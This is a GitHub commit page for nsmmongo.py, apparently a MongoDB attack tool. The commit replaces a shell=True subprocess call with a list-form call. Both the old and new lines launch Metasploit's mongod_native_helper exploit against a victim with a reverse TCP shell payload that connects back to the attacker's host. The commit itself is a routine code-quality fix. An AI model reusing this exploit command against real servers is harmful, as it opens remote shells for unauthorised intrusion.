Skip to content

Commit 3db58ae

Browse files
tripleeetripleee
committed
Avoid shell=True in subprocess.call()
The code doesn't need the shell for anything so this should be more efficient, as well as potentially more secure, and hopefully instructive for readers of the code. See also https://stackoverflow.com/questions/3172470/actual-meaning-of-shell-true-in-subprocess
1 parent 9f9890f commit 3db58ae

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

nsmmongo.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -338,7 +338,7 @@ def enumDbs (mongoConn):
338338

339339
def msfLaunch():
340340
try:
341-
proc = subprocess.call("msfcli exploit/linux/misc/mongod_native_helper RHOST=" + str(victim) +" DB=local PAYLOAD=linux/x86/shell/reverse_tcp LHOST=" + str(myIP) + " LPORT="+ str(myPort) + " E", shell=True)
341+
proc = subprocess.call(["msfcli", "exploit/linux/misc/mongod_native_helper", "RHOST=%s" % victim, "DB=local", "PAYLOAD=linux/x86/shell/reverse_tcp", "LHOST=%s" % myIP, "LPORT=%s" % myPort, "E"])
342342

343343
except:
344344
print "Something went wrong. Make sure Metasploit is installed and path is set, and all options are defined."

0 commit comments

Comments
 (0)
pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy